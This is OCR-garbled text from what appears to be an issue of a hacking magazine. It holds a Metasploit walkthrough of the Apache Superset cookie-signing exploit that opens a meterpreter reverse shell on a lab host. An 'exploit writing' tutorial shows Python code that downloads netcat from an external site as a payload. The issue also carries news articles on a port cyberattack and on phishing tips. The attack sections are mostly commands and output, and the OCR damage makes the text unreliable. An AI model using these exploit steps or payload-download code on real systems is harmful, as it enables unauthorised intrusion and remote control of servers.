m sf6 a u x ilia ry( gather/apache_ su perset_ cookie_ sig_ priv_ esc) > |

Asreaderscanseethe databaseshave been successfullyretrieved.

Apache S upersetS ig R C E M odule

TAR G E T: Apache S uperset < = 2.0.0 IY PE : R emote

M O D U LE : E xploit AN TI-M ALW AR E : N A

Thismoduleexploitsthesame vulnerability of Apache Supersetexplained above butgetsa

meterpretersessionatthe end. L et'sseehow t
hismodulew orks. Ihetargeti
ssameasabove.
m sf6 > search apache su perset

M atching M odul
es

# Name D isclosu
re D ate R ank Check D escription

0 au x iliary/gather/apache su perset cookie sig priv esc 2 02 3 -04-

25 norm al Yes Apache S u perset S igned Cookie P riv E sc
1 ex ploit/linu x /http/apache su perset cookie sig rce 2 02 3 -09 -
06 good Yes Apache S u perset S igned Cookie R CE

I nteract w ith a m odul e by name or index. For exam ple info 1 , use 1 o
r use ex ploit/linu x /http/apache su perset cookie sig rce
m sf6 > use 1
[*] Using configu red payload python/m eterpreter/reverse tcp
m sf6 e x p lo it(
linu x/http/apache_ su perset_ cookie_ sig_ rce) > show optio
ns

M odul
e options (
ex ploit/linu x /http/apache su perset cookie sig rce):

Name C u rrent S ettin R eq u ired D escription

9

AD M IN_ I D 1 yes The I D of an adm i

n ac
cou nt
D ATAB ASE /app/su perset yes The su perset database
hom e/su perset. location
db
PASSW OR D yes The password for the
specified usernam e
** ■*« **■V•*
• • W

P roxies no A proxy chain of form

at type:host:port[,ty
pe:host:port] [...]
R HOSTS The target host( s), s
ee https://docs.m etas
p lo it.com /docs/u sing-
m etasploit/basics/u si
ng-m etasploit.htm l
R POR T 8088 yes The target port ( TCP )
SECR ET KE Y S FI /u sr/share/m et no F ile containing secre
LE asploit-fram ew t keys to try, one pe
ork/data/w ordl r line
ists/su perset_
secret keys.tx

SSL false no N egotiate S S L/TLS for

ou tgoing connections
TAR G ETUR I yes R elative UR I of Apach
e S u perset in sta lla ti
on
USER NAM E yes The usernam e to au the
nticate as
VHO ST no HTTP server v irtu a l h
ost

"Youknow something i
swrongwhen thegovernmentdeclaresopeningsomeone
el
se'smaili
safelony butyourinternetactivity i
sfairgamefordata collecting”
-E.A .B ucchianeri
P ayload options (
python/m eterpreter/reverse tcp ):

Name C u rrent S etting R equired D escription

LHOST yes The listen address (an in te rf

ace may be specified)
LPO R T 4444 yes The listen port

E xploit target:

Id Name

0 Au tom atic Target

m sf6 ex ploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > set rhosts
1 7 2 .1 7 .0.2
rhosts => 1 7 2 .1 7 .0.2
m sf6 ex ploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > check

[-] M sf::O ptionV alidateE rror The follow ing options failed to validat
e: USER NAM E, PASSW OR D
m sf6 ex ploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > set userna
me adm i n
usernam e => adm i n
m sf6 exploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > set passwo
rd adm i n
password => adm i n
m sf6 ex ploitC linu x/http/apache_ su perset_ cookie_ sig_ rce) > check
[*] 1 7 2 .1 7 .0.2 :8 08 8 - The target appears to be vu lnerable. Apache Su
pset 2 .0.0 is vu lnerable
m sf6 ex ploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > |

F ollow H ackercool M ag azine For Latest U pdates

 43
m sf6 ex ploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > set I host
1 7 2 .1 7 .0.1
I host => 1 7 2 .1 7 .0.1
m sf6 ex ploit( linu x/http/apache_ su perset_ cookie_ sig_ rce) > run

[*] S tarted reverse TCP handler on 1 7 2 .1 7 .0.1 :4 4 4 4

1 7 2 .1 7 .0.2 :8 08 8 - Attem pting login
[+] 1 7 2 .1 7 .0.2 :8 08 8 - Logged in Cookie: session=.eJwljzFuAzE M B P -i2 gV
JkaLozxwkkoKNG D ZwZl dB p4LUk4xg9 3 vsq09 jlu5vvdP X sp2 ]3 I tlCqS O gsiAldnJTC
NB Tql hYoJjO B sM vrykVl tqk-i8C5Tl 5H 2 P U0TqUhbqO Kh3 AjZgQ m M nY7 C7 1 2 H C0W W Uf
EG Q FG Q D J7 UR Q 9 rW 9 Xl_ 5P P ekl
toI G LwbG P jwQ I Q Ym m 0xS K3 LJ0bQ 03 u8fD zyz3 m e9 D l
y 7 -E 5ecX I n9 B YA.ZW G bYg.D HnHLW l s7 KD wM diSg Tq3 W UHi W o;
[+] 1 7 2 .1 7 .0.2 :8 08 8 - Found secret key: CHANGE M E TO A COM PLEX R AND O
M SECR ET
[*] 1 7 2 .1 7 .0.2 :8 08 8 - M odified cookie: {" fresh”=>tru e, ”_ id n=>,,2 6 3 1
[*] 1 7 2 .1 7 .0.2 :8 08 8 - Attem pting to resign w ith key: CHANGE ME TO A
COM PLEX R AND OM SECR ET
[*] 1 7 2 .1 7 .0.2 :8 08 8 - New signed cookie: eyJfZnJlc2 gi0nR ydW UsI l9 pZCI
6 IjI2 M zE yN2 M 0NTE xND A0M 2 M 0NzIw0TdkZjA3 YjU2 ZD cl 0TUwYW Q 0ZTYl YThmY2 Fl ZTM
5Yjd]YjI yZG M 4NW I3 ZjkyNzg4YW Ul N2 JiNzJhNW M 5NjM l NG Q lND YyND Q xM D Q yM jk0Yzk
wYW Q 4M zgxYTZkZjI 50D E xM W JkZD A5M jAyNW I 4I i wi Y3 NyZl 9 0b2 tl
biI 6 I m U3 M zM 2 M jA
0M G M 40TA5M G NhY2 Q xM TB kYTdl YW Y0NTUzM 2 Y5NW R i YTci LCJsb2 NhbG Ui 0iJl
biIsInV
zZX JfaW Q i 0jF9 .ZW G bYg.6 gI m wW 0trgI Y3 qG cZFZQ Q tHYD O
[+] 1 7 2 .1 7 .0.2 :8 08 8 - Cookie validated to u ser: adm i n
[+] S u ccessfu lly created db m appi ng w ith id: 1
[+] Usi ng tab: 1
r i

[+] S uperset Creds

Username P assword

adm i
n $ pbkdf2 -sha2 56 $ 2 6 00O O $ NE VnY2 l
4W E E ybl
pVVW dqW Q $ ja7 2 Q cI0T
M P H tCeVm IH zIG O TgB yl lpW hIR qwpCyQ uTk

[+] New D ashboard id: 1

[+] D ashboard perm alink key: zD jqJyaJB vx
[*] Triggering payload
S ending stage ( 2 47 7 2 bytes) to 1 7 2 .1 7 .0.2
[*] M eterpreter session 1 opened ( 1 7 2 .1 7 .0.1 :4 4 4 4 -> 1 7 2 .1 7 .0.2 :3 8 5 7
4) at 2 02 3 -1 1 -2 5 01 :5 9 :5 0 -0500
[*] U nsetting R CE P ayloads
[*] D eleting dashboard
[*] D eleting sq llab tab
[♦ ] D eleting database m appi ng

m eterpreter > |
m eterpreter > syyysinfo
[-] Unknown command: syyysinfo
m eterpreter > sysinfo
Computer : 45f5ce6 fda7 f
OS : Linux 5 .1 0.0-kaU7 -am d6 4 #1 SMP D ebi
an 5 .1 0.2 8 -lka
H l( 2 02 1 -04-1 2 )
Architectu re : x6 4
System Language :C
M eterpreter : python/linu x
m eterpreter > getu id
S erver username: superset
m eterpreter > |

Asreaderscansee, w esuccessfull
y gotameterpretersessionon thetargetsyst
em.
M ajor cyberattack on Australian portssug g estssabotag e by a ’
foreig n state
actor\

CY B E R W AR
David Tuffley/ Ihelatestmedia reportssuggestcargo could be
SeniorL ecturerinApplied Ethics& stranded atthe portsforseveraldays. Australian
FederalPol iceand theAustralian CyberSecurit -
CyberSecurity, Griffit
h Universit
y
y (-entreare investigating thesource and nature
of theattack, deemed a<nationally significant
A seriouscyberattack hasdisrupted operations
incident= by federalcybersecurity coordinator
atseveralof Australia’slargestports, causing del­
Darren Goldie.
aysand congestion. L ateon 1riday, portoperate
-rDP W orld detected an IIbreach thataffected
criticalsyst emsused t o coordinate shipping acti v
Is th er e evidenc e of this being a
-it
y.
m ali
c i
ous at tack ?
DP W orld i sone of Australia’slargestportope­
Ehetiming, scaleand impactof the disruption
rators, handling approximately 40% olthe nation
do suggestthisw asatargeted attack.
’scontainertrade acrossterminalsi nB risbane,
Itoccurred on aFriday night, w hen moststaff
Sydney, Melbourneand F:remant le.
w ere off duty and l
essli kelyto noticeorrespond
DP W orld reacted q uickly tocontain the
to theincident. The targetw asamajorportoper
breach, includingshuttingdow naccesstotheir
atorthathandlesasi gnificantshareof Australia’s
portnetw orksonland, to preventfurtherunauth
trade and commerce. Such anattack canhave
-orised access. Thismeansthey essenti ally <pulle
seriousconseq uencesforAustralia’seconomy,
-dtheplug= on theirinternetconnection t o li
mit
security and sovereignty.
possible furtherharm.
The identitv and motive of theattackersare
D I’ W orld seniordirectorB lakeTierney said
notyetknow n, buttheski ll
sneeded to mount
itisst illpossibleto unload containersfrom ships
such anattack suggesta forei gnstateactortrying
, butthe trucksthattransportl i
recontainerscan­
to undermine Australia’snationalsecurity or
notdrive i noroutof theterminals. Thisi sapre­
economic interests.
cautionw hen theful lextentof adata breach i s
Inrecentyears, cyberattackson portsand shippi
notknow n.
C ont’d on nex tpag e)
-nghave become more common. Forinstance, and adviceto DP W orld and otheraffected parti
inFebruary 2022, severalE uropean portsw ere -esthrough theCri ticalInfrastructure Centre and
hitby acyberattack thatdisrupted oi lterminals, theTrusted Information Sharing N etw ork. Tli es-
Inanotherincidentearly thisyear, aransom egovernmentagenciesareeq uipped toprovide
-w areattack on maritimesoftw areimpacted mor timely supporti ntimesof cri sis.
-ethan 1,000ships. Also i nJanuary 2023, the
Portof L isbonw rastargeted by aransomw are How can we preventfuture
attack w 'hich threatened thereleaseof portdata. attacks?
These incidentshighlightthevulnerability of
themaritime industry to cyberthreatsand the 1l i
eDP W orld cyberattack i saclearw arning of
need forincreased cybersecurity measures. theri sksto theessentialtransportation services
thatpow erAustralia’strade and commerce.
How m i qhtthe attack have Portsaredifficulttarget s. To cause such a
happened? disruption, the attackersw ould have tobe hi ghly
skill
ed and plan ahead. Il efactportshavebeen
So far, thedetailshave notbeen disclosed. B uisuccessfull y hacked more than oncei nrecentl i
-
based onw hatw eknow aboutsimilarcases, i ti s messuggeststhreatsfrom cybercriminalsare
possiblethe attack took advantage of vulnerabili- steadil y increasing.
-ti
es in DP W o r
ld ’ssyste"p f
- or difficultt
s ar e arP et
JJ
S .To.
. Fo r c omp anies such as
m. 1hese vulnerabilities ° D P W orld, it’simportant
are normally closed by causesuchadisruption, to continuously monitor
applyinga<patch= inthe _ _
»_j__i _
i n
__e
_tw _o
_ _rks_i
_ n_r
_ _ea_
_l_t
ime
__,
samew ay yourbrow ser theattackerswouldhavet obe promptly installsecurity
needsupdating every
w eek ortw o t o keep it highlyskilledandplan ahead.'
safefrom being hacked. from each other.
Once hackersgained access, thebreach l i
kel y Dedicated, w ell-resourced cybersecurity
pivoted toinfilt rat etheoperationalsystemsthat personnel, employee training and incidentrespo
directly manage portacti vit
ies. Failingtoisolate -useplansarekey t o improvingpreparedness.
and secure thesecontrolnetw orksallow ed the Portsshould cl osel
y coordinatew i t
h govern
incidentto impactoperations. -mentcounterpartsand industry partnersonint e
Itisal so possible accessw asgained viaa lligencesharing and cybersecurity bestpractices,
phishing emailoramaliciousli nk. Such anattac Cyberthreatsevolveso q ui ckly, alw aysbeing pre
-kmay havetricked anemployee oracontractorpared forthe latestone i sasi gnificantchallenge,
into opening anattachmentorclickingon ali nk Foraseamlessfl ow of goods, w eneed tobe
thatinstalled malw areorransomw are on the constantly vigilantof potentialthreatst o our
netw ork. supply chain infrastructure, hi slatestattack i
s
an urgentreminderthatcyberresiliencemustbe
Now what? atop priority.

DP W orld isw orking urgently to rebuild affect

e- This Article
d syst
emsfrom backups. H ow ever, resetting port
managementnetw orksi sacomplicated process
thatcould take daysorw eeks. Int iltheoperator first appeared in
'score syst
emsare securely restored, cargo fl ow s
may faceongoing delays.
leAustraliangovernmenti scl osely involved fhe C onversation
inmanaging thesituation, providing support
 46
P art3-D ow nloading files and payloads

E XPL OIT W R ITIN G

Til lnow , inourE xploitw riti
ngt ut
orials, youhavelearnthow t ogatherinformationaboutoperat
-ingsystem, how t operform variousfileoperationsand how t oexecuteexternalcommandsfrom i
-nsidetheexpl oit.
InPart3, you w illlearnhow t odow nload fi l
esusingyourexploit . Mostof theexpl oi
tsdow nload
varioust ypesof payloadsinR ealW orld. So, t hisishigh ti
meyou learnhow t odow nload various
fi
l esfrom t heexpl oitcode.
InPython, therearevari ousmodulesthatimpementt he dow nload functi
on. L et
’sseeal lof t
he-
m. Fordow nloading purpose, Ihavechosenazi p archiveof netcat(dow nload informationi sgive
ni nourDow nloadssect i
on) hosted onanexternalw ebsi tealthough, you canuseany fi l
eof your
choice.Justmakesuret o copy the UR L correctly asw eneed tospeci fyitinthecodeof t heexplo-

So, l
et’sbeginw i
ththeurl
lib module.

1 ,url
li
b modul
e
W ew i
llcontinuefrom thesame lie ‘\:rst..exploit thatw el
ei att
heend of Part
-2.
GNU nano 7 .2 f irst exploit

print(
shu tit.whi
ch(
"pert"))

H el
p W rite O ut® W here I s 3 Cut E xecute
E xit R ead Fileffl R epl
ace H P aste Ju stify

Importurl
lib moduleand editthecode asshow nbel
ow .

"4scybersecurityleaders, wehave to createourmessageof influencebecausesecurity is

a cultureandyou need the businesst o takeplaceana bepartof thatsecurityculture.
"
-B ritney Hommerlzheim
■r

s
____________________________________________________________ J
 GNU nano 7 .2 first exploit

im port u rllib
from u rllib i m port request

UR L="https://eternallybored.org/m isc/netcat/netcat-W i
n3 2 -1 .1 1 .z |

result=request.urlretrieve(
UR L, "netcat.exe")|

Help W rite O ut® W here I s Cut E xecute

E xit R ead Fileffl R epl
ace P aste Ju stify
Savechangesand executethefi
rst_exploitasshow nbelow . Thisw i
lldow nload thenetcatfi
leas
how nbelow .

)2 2 2 vm)-[-/python exploit
first_ exploit

2 vm)-[-/pythonexploit
first_ exploit

-/pythonexploit
L -$Is
archive.zip copied_ expl
oit_ 2 netcat.exe
copied_ expl t firstex ploit
oi

2 2 2 vm)-[-/pythonexploit

"S ocialengineering scamsarea particularconcern.W ith thesescams, attackers

presentapostintended t ogetthetargetusert oclick on a link.T hailink usually leads
to the userdownloading somemaliciouscodethathasthepotentialtostealinformation
on the userscomputerormobiledevice.Thesescamsaresometimesalso calledphishing
and bailing, aswellasclick-jacking. W hateverthey'recalled, justknow thatnotevery
poston socialmedia i ssafetoclick on.Youshould takespecialcaret o treateveiy link
with suspicion, especiallythosethatlooklikecli ck bail.
"
-R ick D elgadot.
 -(kali® 2 2 2 vm )-[~ /python_ exploit
S python3 first_ ex ploit

~/python_ exploit

archive.zip copied_ exploit_ 2 netcat.exe

copiedexploit f irste x p lo it unpacked

[
— ( kali® 2 2 2 vm )-[-/python ex ploit]
*— $ f ile netcat.exe
netcat.exe: Zip archive data, at least v2 .0 to extract, compress
ion m ethod=defl ate

r ~/python_ exploit

Ili
sstored asnetcat.exeasIhavespecified thatnamefori
t. N otethati
tst
il
lisazi
parchive. Y ou
analso importthereq uestfuncti
onasshow nbel ow .
GNU nano 7 . 2 f irst e x p l o i t I

im port u rllib.req u est

UR L="

resu lt= u rllib.req u est.u rlretrieve(

U R L , "netcat.exe")

H el
p W rite O ut E xecute
E xit R ead File Ju stify

2 )wgetm odul
e
Y oual
) know w getright? Y es. Iam talkingaboutthepopularbinary thati
sused t
o dow nload fi
l-
49
 50
GNU nano 7 .2

i
m port requests

UR L="httos://et

resu lt=req u ests.get(

UR L)

open(
"netcat 3 .exe, "wb").w rite(resu lt.content)|

H el
p W rite O utHJ W here I s Cut E xecute
E xit R ead Fil
eB S R epl ace J P aste Ju stify

-[~/python_ exploit

archive.zip copied_ exploit_ 2 netcat 2 .exe netcat.exe

copied_ exploit first_ ex ploit netcat 3 .exe

r
-[-/python exploit
L

Inournext ssue. w ew i
llbecombining al lthepython moduleslearntinPart1, Part2and ’art
-3
and explaintoyou how they w i
llbe usefuli
nexploit.
P hishing scam s: 7 safety tips from a cybersecurity ex pert

ON L IN E SECUR ITY
Thembekile OliviaMayayise o anonlineplatform, from w hich rank bought
SeniorL ecturer,T Universit
y
/of the R 6,(
)(
)(
) (aboutUS$32.5) w orth of gi
ftvouchers.
W itw atersrand Once he'd sentthecodeshereceived asecond
emailfrom the <boss= req uesting one morevouc
R ecently, one of my acq uaintances, 1rank, -her.
received anemaill ateonaMonday afternoonw Atthatpoint, Frank reached outtohi sbossthr
-it
hthesubjectli ne, <Areyou stillintheoffice?= -ough W hatsApp and discovered he’d been dup­
Itappeared to comefrom hi smanager, w ho cl ai- ed. frank had fal lenprey t o aphishing scam.
11ed to bestuck i nalong meetingw ithoutthem Thisi sjustone example of many from my ow n
-canst o urgently purchase onlinegi ftvouchersf circles. Otherfriendsand relatives- someof the
-orclients. H e asked forhelp and shared ali nk t
- (C ont’
d on nex tpag e
-m seasoned internetusersw ho know abouttheion, 1 ikeaplione cal linw hich thecallerI alsel ycl
-mportanceof cybersecurity- have also fall enpr-ai mst o be abank offi ci
aland seeksto assi styou
-eyto phishing scams. inresettingyourpassw ord orupdating youracc­
Iam acybersecurity professionalw ho conducts o un t d e tails. < )the r c ommo n v ishin g s ca ms c entr
research onand teachesvariouscybersecurity t o -eonofferi ngdiscountsorrew ardsifyoujoin a
pics. InrecentyearsIhavenoticed (and confir­vacationclub, provided you discloseyourperso­
med through research) thatsome organisationsa nalcreditcard information.
-ndindividualsseem fatigued by cybersecurity a- Socialmediaphishing, meanw hile, happensw h
w arenesseffort s. I
si tpossible thatthey assume -en sca mme r s cre a te fa ke a c co u nts p u rp o rtin g to
mostpeople aretechnologically astuteand cons­ b e re al p eop le (fo r ins tan c e , p osin g a s Fr an k ’s b -
tantly w el
l-informed? Orcould i tsimply be that oss). They thenstartinteractingw ith therealper
fatiguehassetinbecause of the demanding natu -son’sconnectionsto deceivethem into givingu
-reof cybersecurity aw arenesscampaigns? 1hou- p sen si tive in fo rma t
io n o r p e r fo rmi ng fin anc ial fa
I ihave no definitiveansw er, suspectthe v ours .
latter. W ho i
s b eh in d th ese sc a ms ? y pica l l
y , the se a r
I1i
ereality isthatphishing scamsarehere t o st-eseasoned and cunning scammersw ho haveho
-ayand themethodsemployed i ntheirexecutio- n ed t h e ir skills in th e w or l d o f ph i
s hi n g o v e r an
e xten d ed p e riod . S o me w ro r k alon e; o th e rs b elo ­
ncontinue toevol ve. Given my expertise and ex
-perience, Iw ould l i
keto offersevent ipsto help ng t o syndicates.
you staysafefrom phishing scams. Thisi sespeci
-allyimportantduring the fest i
veseason aspeopl P hi shi ng skills
-eshop forgi ftsand book holidaysonline. Il ese
activitiescreate more opportunitiesforcybercri ­ S ucc e ssful p h i
s h e r
s h av e a v a riet
y o : sk ill
s . H ie
minalsto netnew vi ctims. H ow ever, thesetipsa- -ycombine psycho ogi calt acti csand technical
reappropriate throughouttheyear. Cybercrimin prow ess.
-alsdon’ttakebreaks- soyou shouldn’teverdr­ They aremastermanipulators, playing onvi cti­
op yourguard. ms’ emotions. Individualsaredeceived into beli­
evingthey’vesecured asubstantialsum, oftenm
W hati s phi shing? -ill
ion s , th rou g h a ja ck p o t w in . Th is s c he me false
-lycl ai msthattheircellphonenumberoremail
<Phishing= isastrategy designed to deceivepe­w asused brent ry. Conseq uently, thevictim do­
ople into revealingsensi tiveinformationsuch as esn’tseek clarification. E xcited aboutgetting the
creditcard details, logi ncredentialsand, insom- w ind fa l lp ay me n t q u i
c k l
y , th e y give th ei r pe rso n ­
einstances, identification numbers. alinformationt o cybercriminals.
The mostcommonform of phishingi sviaema I i esescammerseventailortheirapproach t o
-ikphisherssend fraudulentemailsthatappeart - match individuals'personalbeli efs. Forexample
o befrom legitimatesources. The messagesoft e- if you h a ve an affin ity for a n c estral w o rs hip , be
ncontain l i
nksto fakew ebsi tesdesigned t o steal p rep ar ed for a me s sag e fr o m s ome on e c laimi n g
logi ncredentialsorothersensi tiveinformation. t o be amedium, asserting thatyourgreat -great -
Phesameemailw i llbesentto many addresses. grandfatheri sreq uesting amoney ri tualinvolvin
Phi sherscanobtain emailsfrom placessuch as -gadepositto aparticularaccountand promisin
corporatew ebsi tes, existingdatabreaches, soci al -g mu lt i
p li
ca tio n o i y ou r fu n d s - ev en th o ug h y o ­
mediaplatforms, businesscardsorotherpublicl- u r an ce stors h ave c o mmu n ic a ted n o s uc h in form
yavailable company documents. -ation.
<’ybercriminalsknow 'thatcasti ng theirnetw i d- L ikew ise, i fyou areadevout ’hri stian, someo­
emeansthey’l lsurely catch some. n e cla i mi ng to b e <Pr o p h e t Pr ofit" mi gh t att emp t
V oicephishing (vi shi
ng) i sanotherform of t his t o co n t act y o u th ro ug h a me s sa ging p l
a t form, s u-
scam. H ere, perpetratorsusevoicecommunicati- (C ont ’ d on ne x t pag e )